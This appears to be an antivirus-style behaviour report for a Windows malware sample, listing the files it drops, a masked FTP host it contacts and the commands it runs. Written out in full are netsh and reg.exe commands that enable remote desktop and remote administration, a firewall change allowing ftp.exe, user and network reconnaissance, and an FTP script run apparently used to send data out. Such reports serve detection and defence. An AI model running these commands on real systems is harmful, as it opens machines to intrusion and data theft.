Technical Information
- '<SYSTEM32>\netsh.exe' firewall set service remoteadmin enable
- '<SYSTEM32>\netsh.exe' firewall set service remotedesktop enable
- C:\krypton.exe
- C:\stels setup.vbs
- C:\lana.jpg
- %TEMP%\8ecf.tmp\8f3e.tmp\8f3f.bat
- C:\ebt.txt
- C:\egt.txt
- C:\script.bat
- 'ft###.#itroflare.com':21
- DNS ASK ft###.#itroflare.com
- ClassName: 'EDIT' WindowName: ''
- 'C:\krypton.exe'
- 'C:\krypton.exe' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' "C:\STELS SETUP.VBS"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\8ECF.tmp\8F3E.tmp\8F3F.bat C:\Krypton.exe"
- '<SYSTEM32>\reg.exe' ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net.exe' users
- '<SYSTEM32>\net1.exe' users
- '<SYSTEM32>\ipconfig.exe'
- '<SYSTEM32>\ftp.exe' -s:script.bat -nd
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<SYSTEM32>\ftp.exe"